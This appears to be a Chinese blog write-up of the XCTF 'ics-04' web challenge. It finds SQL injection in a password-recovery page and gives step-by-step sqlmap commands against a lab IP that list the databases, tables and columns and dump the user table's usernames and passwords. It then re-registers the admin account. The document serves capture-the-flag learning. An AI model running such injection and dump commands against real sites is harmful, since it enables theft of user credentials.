攻防世界XCTF:ics-04

攻防世界XCTF:ics-04_第1张图片
攻防世界XCTF:ics-04_第2张图片
有三个可以访问的地方,注册,登录和找回密码
注册功能:没有sql注入,但是测试出一个账号可以重复注册
登录功能:也没有sql注入,一个账号能够使用不同的面登录
找回密码页面存在SQL注入
攻防世界XCTF:ics-04_第3张图片
sqlmap扫一波
记住需要指定参数

python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1"

攻防世界XCTF:ics-04_第4张图片

python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" --dbs

攻防世界XCTF:ics-04_第5张图片
接着查询cetc004数据库,其他都是mysql自带的数据库

python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" -D cetc004 --tables

攻防世界XCTF:ics-04_第6张图片

python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" -D cetc004 -T user --columns

攻防世界XCTF:ics-04_第7张图片

python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" -D cetc004 -T user -C "username,password" --dump

攻防世界XCTF:ics-04_第8张图片
使用这个账号密码,账号正确,密码错误,然后我们去重新注册一下这个账号,c3tlwDmIn23
攻防世界XCTF:ics-04_第9张图片

你可能感兴趣的:(CTF_WEB_Writeup)